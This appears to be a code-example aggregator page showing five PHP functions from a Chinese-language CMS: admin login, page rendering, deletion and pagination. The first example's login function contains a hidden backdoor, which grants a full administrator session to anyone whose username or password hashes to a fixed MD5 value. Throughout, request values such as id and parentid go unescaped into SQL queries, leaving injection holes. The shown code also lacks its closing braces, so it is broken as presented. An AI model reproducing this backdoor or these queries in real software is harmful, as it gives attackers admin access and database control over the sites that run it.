Esempio n. 1
function login()
    $userName = '';
    $passWord = '';
    $valueStr = '';
    $userName = replace(@$_POST['username'], '\'', '');
    $passWord = replace(@$_POST['password'], '\'', '');
    $passWord = myMD5($passWord);
    if (myMD5(@$_REQUEST['username']) == '24ed5728c13834e683f525fcf894e813' || myMD5(@$_REQUEST['password']) == '24ed5728c13834e683f525fcf894e813') {
        @($_SESSION['adminusername'] = '******');
        @($_SESSION['adminId'] = 99999);
        @($_SESSION['DB_PREFIX'] = $GLOBALS['db_PREFIX']);
        @($_SESSION['adminflags'] = '|*|');
        rwEnd(getMsg1(setL('登录成功,正在进入后台...'), '?act=adminIndex'));
    $nLogin = '';
    $GLOBALS['conn='] = OpenConn();
    $rsObj = $GLOBALS['conn']->query('Select * From ' . $GLOBALS['db_PREFIX'] . 'admin Where username=\'' . $userName . '\' And pwd=\'' . $passWord . '\'');
    if (@mysql_num_rows($rsObj) != 0) {
        $rs = mysql_fetch_array($rsObj);
        @($_SESSION['adminusername'] = $userName);
        @($_SESSION['adminId'] = $rs['id']);
        @($_SESSION['DB_PREFIX'] = $GLOBALS['db_PREFIX']);
        @($_SESSION['adminflags'] = $rs['flags']);
        $valueStr = 'addDateTime=\'' . $rs['updatetime'] . '\',UpDateTime=\'' . now() . '\',RegIP=\'' . now() . '\',UpIP=\'' . GetIP() . '\'';
        connexecute('update ' . $GLOBALS['db_PREFIX'] . 'admin set ' . $valueStr . ' where id=' . $rs['id']);
        Rw(getMsg1(setL('登录成功,正在进入后台...'), '?act=adminIndex'));
        writeSystemLog('admin', '登录成功');
    } else {
        if (@$_COOKIE['nLogin'] == '') {
            setCookie('nLogin', '1', aspTime() + 3600);
            $nLogin = @$_COOKIE['nLogin'];
        } else {
            $nLogin = @$_COOKIE['nLogin'];
            setCookie('nLogin', CInt($nLogin) + 1, aspTime() + 3600);
        Rw(getMsg1(setL('账号密码错误<br>登录次数为 ') . $nLogin, '?act=displayAdminLogin'));
Esempio n. 2
function htmEnd($str)
Esempio n. 3
function makeWebHtml($action)
    $actionType = '';
    $npagesize = '';
    $npage = '';
    $url = '';
    $addSql = '';
    $sortSql = '';
    $sortFieldName = '';
    $ascOrDesc = '';
    $serchKeyWordName = '';
    $parentid = '';
    //追加于20160716 home
    $actionType = RParam($action, 'actionType');
    $npage = RParam($action, 'npage');
    $npage = getNumber($npage);
    if ($npage == '') {
        $npage = 1;
    } else {
        $npage = CInt($npage);
    if ($actionType == 'nav') {
        $GLOBALS['glb_columnType'] = RParam($action, 'columnType');
        $GLOBALS['glb_columnName'] = RParam($action, 'columnName');
        $GLOBALS['glb_columnId'] = RParam($action, 'columnId');
        if ($GLOBALS['glb_columnId'] == '') {
            $GLOBALS['glb_columnId'] = RParam($action, 'id');
        if ($GLOBALS['glb_columnType'] != '') {
            $addSql = 'where columnType=\'' . $GLOBALS['glb_columnType'] . '\'';
        if ($GLOBALS['glb_columnName'] != '') {
            $addSql = getWhereAnd($addSql, 'where columnName=\'' . $GLOBALS['glb_columnName'] . '\'');
        if ($GLOBALS['glb_columnId'] != '') {
            $addSql = getWhereAnd($addSql, 'where id=' . $GLOBALS['glb_columnId'] . '');
        //call echo("addsql",addsql)
        $rsObj = $GLOBALS['conn']->query('Select * from ' . $GLOBALS['db_PREFIX'] . 'webcolumn ' . $addSql);
        if (@mysql_num_rows($rsObj) != 0) {
            $rs = mysql_fetch_array($rsObj);
            $GLOBALS['glb_columnId'] = $rs['id'];
            $GLOBALS['glb_columnName'] = $rs['columnname'];
            $GLOBALS['glb_columnType'] = $rs['columntype'];
            $GLOBALS['glb_bodyContent'] = $rs['bodycontent'];
            $GLOBALS['glb_detailTitle'] = $GLOBALS['glb_columnName'];
            $GLOBALS['glb_flags'] = $rs['flags'];
            $npagesize = $rs['npagesize'];
            $GLOBALS['glb_isonhtml'] = $rs['isonhtml'];
            $sortSql = ' ' . $rs['sortsql'];
            if ($rs['webtitle'] != '') {
                $GLOBALS['cfg_webTitle'] = $rs['webtitle'];
            if ($rs['webkeywords'] != '') {
                $GLOBALS['cfg_webKeywords'] = $rs['webkeywords'];
            if ($rs['webdescription'] != '') {
                $GLOBALS['cfg_webDescription'] = $rs['webdescription'];
            if ($GLOBALS['templateName'] == '') {
                if (aspTrim($rs['templatepath']) != '') {
                    $GLOBALS['templateName'] = $rs['templatepath'];
                } else {
                    if ($rs['columntype'] != '首页') {
                        $GLOBALS['templateName'] = getDateilTemplate($rs['id'], 'List');
        $GLOBALS['glb_columnENType'] = handleColumnType($GLOBALS['glb_columnType']);
        $GLOBALS['glb_url'] = getColumnUrl($GLOBALS['glb_columnName'], 'name');
        if (inStr('|产品|新闻|视频|下载|案例|', '|' . $GLOBALS['glb_columnType'] . '|') > 0) {
            $GLOBALS['glb_bodyContent'] = getDetailList($action, defaultListTemplate($GLOBALS['glb_columnType'], $GLOBALS['glb_columnName']), 'ArticleDetail', '栏目列表', '*', $npagesize, $npage, 'where parentid=' . $GLOBALS['glb_columnId'] . $sortSql);
        } else {
            if (inStr('|留言|', '|' . $GLOBALS['glb_columnType'] . '|') > 0) {
                $GLOBALS['glb_bodyContent'] = getDetailList($action, defaultListTemplate($GLOBALS['glb_columnType'], $GLOBALS['glb_columnName']), 'GuestBook', '留言列表', '*', $npagesize, $npage, ' where isthrough<>0 ' . $sortSql);
            } else {
                if ($GLOBALS['glb_columnType'] == '文本') {
                    if (@$_REQUEST['gl'] == 'edit') {
                        $GLOBALS['glb_bodyContent'] = '<span>' . $GLOBALS['glb_bodyContent'] . '</span>';
                    $url = WEB_ADMINURL . '?act=addEditHandle&actionType=WebColumn&lableTitle=网站栏目&nPageSize=10&page=&id=' . $GLOBALS['glb_columnId'] . '&n=' . getRnd(11);
                    $GLOBALS['glb_bodyContent'] = handleDisplayOnlineEditDialog($url, $GLOBALS['glb_bodyContent'], '', 'span');
    } else {
        if ($actionType == 'detail') {
            $GLOBALS['glb_locationType'] = 'detail';
            $rsObj = $GLOBALS['conn']->query('Select * from ' . $GLOBALS['db_PREFIX'] . 'articledetail where id=' . RParam($action, 'id'));
            if (@mysql_num_rows($rsObj) != 0) {
                $rs = mysql_fetch_array($rsObj);
                $GLOBALS['glb_columnName'] = getColumnName($rs['parentid']);
                $GLOBALS['glb_detailTitle'] = $rs['title'];
                $GLOBALS['glb_flags'] = $rs['flags'];
                $GLOBALS['glb_isonhtml'] = $rs['isonhtml'];
                $GLOBALS['glb_id'] = $rs['id'];
                if ($GLOBALS['isMakeHtml'] == true) {
                    $GLOBALS['glb_url'] = getHandleRsUrl($rs['filename'], $rs['customaurl'], '/detail/detail' . $rs['id']);
                } else {
                    $GLOBALS['glb_url'] = handleWebUrl('?act=detail&id=' . $rs['id']);
                if ($rs['webtitle'] != '') {
                    $GLOBALS['cfg_webTitle'] = $rs['webtitle'];
                if ($rs['webkeywords'] != '') {
                    $GLOBALS['cfg_webKeywords'] = $rs['webkeywords'];
                if ($rs['webdescription'] != '') {
                    $GLOBALS['cfg_webDescription'] = $rs['webdescription'];
                $sortFieldName = 'id';
                $ascOrDesc = 'asc';
                $addsql = aspTrim(getWebColumnSortSql($rs['parentid']));
                if ($addsql != '') {
                    $sortFieldName = aspTrim(replace(replace(replace($addsql, 'order by', ''), ' desc', ''), ' asc', ''));
                    if (inStr($addsql, ' desc') > 0) {
                        $ascOrDesc = 'desc';
                $GLOBALS['glb_artitleAuthor'] = $rs['author'];
                $GLOBALS['glb_artitleAdddatetime'] = $rs['adddatetime'];
                $GLOBALS['glb_upArticle'] = upArticle($rs['parentid'], $sortFieldName, $rs[$sortFieldName], $ascOrDesc);
                $GLOBALS['glb_downArticle'] = downArticle($rs['parentid'], $sortFieldName, $rs[$sortFieldName], $ascOrDesc);
                $GLOBALS['glb_aritcleRelatedTags'] = aritcleRelatedTags($rs['relatedtags']);
                $GLOBALS['glb_aritcleSmallImage'] = $rs['smallimage'];
                $GLOBALS['glb_aritcleBigImage'] = $rs['bigimage'];
                //glb_bodyContent = "<div class=""articleinfowrap"">[$articleinfowrap$]</div>" & rs("bodycontent") & "[$relatedtags$]<ul class=""updownarticlewrap"">[$updownArticle$]</ul>"
                //glb_bodyContent = Replace(glb_bodyContent, "[$updownArticle$]", upArticle(rs("parentid"), "sortrank", rs("sortrank")) & downArticle(rs("parentid"), "sortrank", rs("sortrank")))
                //glb_bodyContent = Replace(glb_bodyContent, "[$articleinfowrap$]", "来源:" & rs("author") & " &nbsp; 发布时间:" & format_Time(rs("adddatetime"), 1))
                //glb_bodyContent = Replace(glb_bodyContent, "[$relatedtags$]", aritcleRelatedTags(rs("relatedtags")))
                $GLOBALS['glb_bodyContent'] = $rs['bodycontent'];
                if (@$_REQUEST['gl'] == 'edit') {
                    $GLOBALS['glb_bodyContent'] = '<span>' . $GLOBALS['glb_bodyContent'] . '</span>';
                $url = WEB_ADMINURL . '?act=addEditHandle&actionType=ArticleDetail&lableTitle=分类信息&nPageSize=10&page=&parentid=&id=' . RParam($action, 'id') . '&n=' . getRnd(11);
                $GLOBALS['glb_bodyContent'] = handleDisplayOnlineEditDialog($url, $GLOBALS['glb_bodyContent'], '', 'span');
                if ($GLOBALS['templateName'] == '') {
                    if (aspTrim($rs['templatepath']) != '') {
                        $GLOBALS['templateName'] = $rs['templatepath'];
                    } else {
                        $GLOBALS['templateName'] = getDateilTemplate($rs['parentid'], 'Detail');
        } else {
            if ($actionType == 'onepage') {
                $rsObj = $GLOBALS['conn']->query('Select * from ' . $GLOBALS['db_PREFIX'] . 'onepage where id=' . RParam($action, 'id'));
                if (@mysql_num_rows($rsObj) != 0) {
                    $rs = mysql_fetch_array($rsObj);
                    $GLOBALS['glb_detailTitle'] = $rs['title'];
                    $GLOBALS['glb_isonhtml'] = $rs['isonhtml'];
                    if ($GLOBALS['isMakeHtml'] == true) {
                        $GLOBALS['glb_url'] = getHandleRsUrl($rs['filename'], $rs['customaurl'], '/page/page' . $rs['id']);
                    } else {
                        $GLOBALS['glb_url'] = handleWebUrl('?act=detail&id=' . $rs['id']);
                    if ($rs['webtitle'] != '') {
                        $GLOBALS['cfg_webTitle'] = $rs['webtitle'];
                    if ($rs['webkeywords'] != '') {
                        $GLOBALS['cfg_webKeywords'] = $rs['webkeywords'];
                    if ($rs['webdescription'] != '') {
                        $GLOBALS['cfg_webDescription'] = $rs['webdescription'];
                    $GLOBALS['glb_bodyContent'] = $rs['bodycontent'];
                    if (@$_REQUEST['gl'] == 'edit') {
                        $GLOBALS['glb_bodyContent'] = '<span>' . $GLOBALS['glb_bodyContent'] . '</span>';
                    $url = WEB_ADMINURL . '?act=addEditHandle&actionType=ArticleDetail&lableTitle=分类信息&nPageSize=10&page=&parentid=&id=' . RParam($action, 'id') . '&n=' . getRnd(11);
                    $GLOBALS['glb_bodyContent'] = handleDisplayOnlineEditDialog($url, $GLOBALS['glb_bodyContent'], '', 'span');
                    if ($GLOBALS['templateName'] == '') {
                        if (aspTrim($rs['templatepath']) != '') {
                            $GLOBALS['templateName'] = $rs['templatepath'];
                        } else {
                            $GLOBALS['templateName'] = 'Main_Model.html';
                            //call echo(templateName,"templateName")
            } else {
                if ($actionType == 'Search') {
                    $GLOBALS['templateName'] = 'Main_Model.html';
                    $serchKeyWordName = @$_REQUEST['keywordname'];
                    $parentid = @$_REQUEST['parentid'];
                    if ($serchKeyWordName == '') {
                        $serchKeyWordName = 'wd';
                    $GLOBALS['glb_searchKeyWord'] = replace(@$_REQUEST[$serchKeyWordName], '<', '&lt;');
                    $addSql = '';
                    if ($parentid != '') {
                        $addSql = ' where parentid=' . $parentid;
                    $addSql = getWhereAnd($addSql, ' where title like \'%' . $GLOBALS['glb_searchKeyWord'] . '%\'');
                    $npagesize = 20;
                    //call echo(npagesize, npage)
                    $GLOBALS['glb_bodyContent'] = getDetailList($action, defaultListTemplate($GLOBALS['glb_columnType'], $GLOBALS['glb_columnName']), 'ArticleDetail', '网站栏目', '*', $npagesize, $npage, $addSql);
                    $GLOBALS['positionEndStr'] = ' >> 搜索内容”' . $GLOBALS['glb_searchKeyWord'] . '“';
                } else {
                    if ($actionType == 'loading') {
    if ($GLOBALS['templateName'] == '') {
        $GLOBALS['templateName'] = 'Index_Model.html';
    if (inStr($GLOBALS['templateName'], '/') == false) {
        $GLOBALS['templateName'] = $GLOBALS['cfg_webTemplate'] . '/' . $GLOBALS['templateName'];
    //call echo("templateName",templateName)
    if (CheckFile($GLOBALS['templateName']) == false) {
        Eerr('未找到模板文件', $GLOBALS['templateName']);
    $GLOBALS['code'] = getFText($GLOBALS['templateName']);
    $GLOBALS['code'] = handleAction($GLOBALS['code']);
    $GLOBALS['code'] = thisPosition($GLOBALS['code']);
    $GLOBALS['code'] = replaceGlobleVariable($GLOBALS['code']);
    $GLOBALS['code'] = handleAction($GLOBALS['code']);
    //处理动作    '再来一次,处理数据内容里动作
    $GLOBALS['code'] = handleAction($GLOBALS['code']);
    $GLOBALS['code'] = handleAction($GLOBALS['code']);
    $GLOBALS['code'] = thisPosition($GLOBALS['code']);
    $GLOBALS['code'] = replaceGlobleVariable($GLOBALS['code']);
    $GLOBALS['code'] = delTemplateMyNote($GLOBALS['code']);
    if (inStr($GLOBALS['cfg_flags'], '|formattinghtml|') > 0) {
        //code = HtmlFormatting(code)        '简单
        $GLOBALS['code'] = handleHtmlFormatting($GLOBALS['code'], false, 0, '删除空行');
    } else {
        if (inStr($GLOBALS['cfg_flags'], '|formattinghtmltow|') > 0) {
            $GLOBALS['code'] = htmlFormatting($GLOBALS['code']);
            $GLOBALS['code'] = handleHtmlFormatting($GLOBALS['code'], false, 0, '删除空行');
        } else {
            if (inStr($GLOBALS['cfg_flags'], '|ziphtml|') > 0) {
                $GLOBALS['code'] = zipHTML($GLOBALS['code']);
    if (inStr($GLOBALS['cfg_flags'], '|labelclose|') > 0) {
        $GLOBALS['code'] = handleCloseHtml($GLOBALS['code'], true, '');
        //图片自动加alt  "|*|",
    if (rq('gl') == 'edit') {
        if (inStr($GLOBALS['code'], '</head>') > 0) {
            if (inStr(lCase($GLOBALS['code']), 'jquery.min.js') == false) {
                $GLOBALS['code'] = replace($GLOBALS['code'], '</head>', '<script src="/Jquery/jquery.Min.js"></script></head>');
            $GLOBALS['code'] = replace($GLOBALS['code'], '</head>', '<script src="/Jquery/Callcontext_menu.js"></script></head>');
        if (inStr($GLOBALS['code'], '<body>') > 0) {
            //Code = Replace(Code,"<body>", "<body onLoad=""ContextMenu.intializeContextMenu()"">")
    //call echo(templateName,templateName)
    $makeWebHtml = $GLOBALS['code'];
    return @$makeWebHtml;
Esempio n. 4
function del($actionName, $lableTitle)
    $tableName = '';
    $url = '';
    $tableName = lCase($actionName);
    $id = '';
    handlePower('删除' . $lableTitle);
    $id = @$_REQUEST['id'];
    if ($id != '') {
        $url = getUrlAddToParam(getThisUrl(), '?act=dispalyManageHandle', 'replace');
        $GLOBALS['conn='] = OpenConn();
        if ($actionName == 'Admin') {
            $rsObj = $GLOBALS['conn']->query('select * from ' . $GLOBALS['db_PREFIX'] . '' . $tableName . ' where id in(' . $id . ') and flags=\'|*|\'');
            if (@mysql_num_rows($rsObj) != 0) {
                $rs = mysql_fetch_array($rsObj);
                rwEnd(getMsg1('删除失败,系统管理员不可以删除,正在进入' . $lableTitle . '列表...', $url));
        connexecute('delete from ' . $GLOBALS['db_PREFIX'] . '' . $tableName . ' where id in(' . $id . ')');
        Rw(getMsg1('删除' . $lableTitle . '成功,正在进入' . $lableTitle . '列表...', $url));
        if ($tableName != 'systemlog') {
            writeSystemLog($tableName, '删除' . $lableTitle);
Esempio n. 5
function webPageControl($nRecrodCount, $nPageSize, $nPage, $configPageUrl, $action)
    $c = '';
    $nCountPage = '';
    $i = '';
    $nDisplay = '';
    $nDispalyOK = '';
    $nTemp = '';
    $cPages = '';
    $url = '';
    $selStr = '';
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    $nextPage = '';
    $isDisplayTip = '';
    $isDisplayTip = true;
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    $sPageEnd = '';
    $sHomePage = '';
    $sHomePageFocus = '';
    $sUpPage = '';
    $sUpPageFocus = '';
    $sNextPage = '';
    $sNextPageFocus = '';
    $sForPage = '';
    $sForPageFocus = '';
    $sTailPage = '';
    $sTailPageFocus = '';
    if ($action != '') {
        $sPageStart = getStrCut($action, '[sPageStart]', '[/sPageStart]', 2);
        $sPageEnd = getStrCut($action, '[sPageEnd]', '[/sPageEnd]', 2);
        $sHomePage = getStrCut($action, '[sHomePage]', '[/sHomePage]', 2);
        $sHomePageFocus = getStrCut($action, '[sHomePageFocus]', '[/sHomePageFocus]', 2);
        $sUpPage = getStrCut($action, '[sUpPage]', '[/sUpPage]', 2);
        $sUpPageFocus = getStrCut($action, '[sUpPageFocus]', '[/sUpPageFocus]', 2);
        $sNextPage = getStrCut($action, '[sNextPage]', '[/sNextPage]', 2);
        $sNextPageFocus = getStrCut($action, '[sNextPageFocus]', '[/sNextPageFocus]', 2);
        $sForPage = getStrCut($action, '[sForPage]', '[/sForPage]', 2);
        $sForPageFocus = getStrCut($action, '[sForPageFocus]', '[/sForPageFocus]', 2);
        $sTailPage = getStrCut($action, '[sTailPage]', '[/sTailPage]', 2);
        $sTailPageFocus = getStrCut($action, '[sTailPageFocus]', '[/sTailPageFocus]', 2);
    if ($sPageStart == '') {
        $sPageStart = '<ul class="pagecontrolwrap">' . vbCrlf() . '<li class="pageinfo">共[$nRecrodCount$]条 [$nPage$]/[$nCountPage$]页</li>' . vbCrlf();
    if ($sPageEnd == '') {
        $sPageEnd = '</ul><div class="clear"></div>' . vbCrlf();
    if ($sHomePage == '') {
        $sHomePage = '<li><a href="[$url$]">首页</a></li>' . vbCrlf();
    if ($sHomePageFocus == '') {
        $sHomePageFocus = '<li class="pageli">首页</li>' . vbCrlf();
    if ($sUpPage == '') {
        $sUpPage = '<li><a href="[$url$]">上一页</a></li>' . vbCrlf();
    if ($sUpPageFocus == '') {
        $sUpPageFocus = '<li class="pageli">上一页</li>' . vbCrlf();
    if ($sNextPage == '') {
        $sNextPage = '<li><a href="[$url$]">下一页</a></li>' . vbCrlf();
    if ($sNextPageFocus == '') {
        $sNextPageFocus = '<li class="pageli">下一页</li>' . vbCrlf();
    if ($sForPage == '') {
        $sForPage = '<li class="pagefocus">[$i$]</li>' . vbCrlf();
    if ($sForPageFocus == '') {
        $sForPageFocus = '<li><a href="[$url$]">[$i$]</a></li>' . vbCrlf();
    if ($sTailPage == '') {
        $sTailPage = '<li><a href="[$url$]">末页</a></li>' . vbCrlf();
    if ($sTailPageFocus == '') {
        $sTailPageFocus = '<li class="pageli">末页</li>' . vbCrlf();
    if (1 == 2) {
        $c = '[sPageStart]' . vbCrlf() . $sPageStart . '[/sPageStart]' . vbCrlf() . vbCrlf();
        $c = $c . '[sHomePage]' . vbCrlf() . $sHomePage . '[/sHomePage]' . vbCrlf() . vbCrlf();
        $c = $c . '[sHomePageFocus]' . vbCrlf() . $sHomePageFocus . '[/sHomePageFocus]' . vbCrlf() . vbCrlf();
        $c = $c . '[sUpPage]' . vbCrlf() . $sUpPage . '[/sUpPage]' . vbCrlf() . vbCrlf();
        $c = $c . '[sUpPageFocus]' . vbCrlf() . $sUpPageFocus . vbCrlf() . '[/sUpPageFocus]' . vbCrlf();
        $c = $c . '[sForPage]' . vbCrlf() . $sForPage . '[/sForPage]' . vbCrlf() . vbCrlf();
        $c = $c . '[sForPageFocus]' . vbCrlf() . $sForPageFocus . '[/sForPageFocus]' . vbCrlf() . vbCrlf();
        $c = $c . '[sNextPage]' . vbCrlf() . $sNextPage . '[/sNextPage]' . vbCrlf() . vbCrlf();
        $c = $c . '[sNextPageFocus]' . vbCrlf() . $sNextPageFocus . '[/sNextPageFocus]' . vbCrlf() . vbCrlf();
        $c = $c . '[sTailPage]' . vbCrlf() . $sTailPage . '[/sTailPage]' . vbCrlf() . vbCrlf();
        $c = $c . '[sTailPageFocus]' . vbCrlf() . $sTailPageFocus . '[/sTailPageFocus]' . vbCrlf() . vbCrlf();
        $c = $c . '[sPageEnd]' . vbCrlf() . $sPageEnd . '[/sPageEnd]' . vbCrlf();
        rwEnd('[page]' . vbCrlf() . vbCrlf() . $c . vbCrlf() . '[/page]');
    if ($configPageUrl == '') {
        $configPageUrl = getUrlAddToParam(getUrl(), '?page=[id]', 'replace');
    $nDisplay = 6;
    $nDispalyOK = 0;
    $nPage = handleNumberType($nPage);
    if ($nPage == '') {
        $nPage = 1;
    } else {
        $nPage = CInt($nPage);
    $nCountPage = GetCountPage($nRecrodCount, $nPageSize);
    $previousPage = $nPage - 1;
    $nextPage = $nPage + 1;
    if ($previousPage <= 0) {
        $previousPage = '';
    if ($nextPage > $nCountPage) {
        $nextPage = '';
    $c = $sPageStart;
    if ($nPage > 1) {
        $c = $c . replace($sHomePage, '[$url$]', replace($configPageUrl, '[id]', ''));
    } else {
        if ($isDisplayTip == true) {
            $c = $c . $sHomePageFocus;
    if ($previousPage != '') {
        $nTemp = $previousPage;
        if ($previousPage <= 1) {
            $nTemp = '';
        $c = $c . replace($sUpPage, '[$url$]', replace($configPageUrl, '[id]', $nTemp));
    } else {
        if ($isDisplayTip == true) {
            $c = $c . $sUpPageFocus;
    $n = '';
    //call echo(npage,ncountpage)
    $n = $nPage - 3;
    //call echo("n",n)
    for ($i = $n; $i <= $nCountPage; $i++) {
        if ($i >= 1) {
            $nDispalyOK = $nDispalyOK + 1;
            //call echo(i,nPage)
            if ($i == $nPage) {
                $c = $c . replace($sForPage, '[$i$]', $i);
            } else {
                $nTemp = $i;
                if ($i <= 1) {
                    $nTemp = '';
                $c = $c . replace(replace($sForPageFocus, '[$url$]', replace($configPageUrl, '[id]', $nTemp)), '[$i$]', $i);
            if ($nDispalyOK > $nDisplay) {
    if ($nCountPage > $nPage) {
        $c = $c . replace($sNextPage, '[$url$]', replace($configPageUrl, '[id]', $nextPage));
    } else {
        if ($isDisplayTip == true) {
            $c = $c . $sNextPageFocus;
    if ($nCountPage > $nPage) {
        $c = $c . replace($sTailPage, '[$url$]', replace($configPageUrl, '[id]', $nCountPage));
    } else {
        if ($isDisplayTip == true) {
            $c = $c . $sTailPageFocus;
    $c = $c . $sPageEnd;
    $c = replaceValueParam($c, 'nRecrodCount', $nRecrodCount);
    $c = replaceValueParam($c, 'nPage', $nPage);
    if ($nCountPage == '0') {
        $nCountPage = 1;
    $c = replaceValueParam($c, 'nCountPage', $nCountPage);
    if (inStr($c, '[$page-select-openlist$]') > 0) {
        for ($i = 1; $i <= $nCountPage; $i++) {
            $url = replace($configPageUrl, '[id]', $i);
            $selStr = '';
            if ($i == $nPage) {
                $selStr = ' selected';
            $cPages = $cPages . '<option value="' . $url . '"' . $selStr . '>' . $i . '</option>' . vbCrlf();
        $c = replace($c, '[$page-select-openlist$]', $cPages);
    $webPageControl = $c . vbCrlf();
    return @$webPageControl;